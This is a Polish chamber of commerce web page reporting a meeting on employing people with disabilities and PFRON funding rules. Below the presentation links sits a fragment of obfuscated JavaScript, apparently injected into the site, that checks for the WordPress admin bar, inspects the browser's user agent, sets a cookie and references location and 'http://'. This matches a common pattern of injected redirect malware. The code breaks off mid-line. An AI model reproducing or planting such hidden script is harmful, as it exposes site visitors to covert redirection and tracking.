Relacja ze spotkania – Zatrudnianie osób z niepełnosprawnościami. | Północna Izba Gospodarcza w Koszalinie

W dniu 21 lutego br o godzinie 11.30 odbyło się kolejne bezpłatnie spotkanie w ramach naszej akcji szkoleniowej. Serdecznie dziękujemy wszystkim uczestnikom spotkania za przybycie oraz prelegentom z Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych ze Szczecina za podzielenie się swoją wiedzą. Także dziękujemy za przypomnienie informacji na temat JPK dla mikro-przedsiębiorców i E-mikrofirmy – prostej, intuicyjnej i darmowej aplikacji która ułatwia użytkownikom składanie oświadczeń JPK

Na spotkaniu przybliżono informacje m.in o:

  • zasady obowiązujące w trakcie naboru i weryfikacji formalnej ofert zatrudnienia osób niepełnosprawnych;
  • zasady zawierania porozumienia z potencjalnymi pracodawcami w sprawie współpracy przy realizacji programu;
  • zasady kwalifikowalności kosztów;
  • zasady przekazywania i rozliczania środków PFRON;
  • zasady ogłaszania konkursów dla pracodawców zatrudniających
    osoby niepełnosprawne.

Zachęcamy do pobrania i zapoznania się z prezentacjami:

19.02.2018 r. Pomoc dla pracodawców zatrudniających osoby niepełnosprawne

SODiR – prezentacja 2018

 

'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m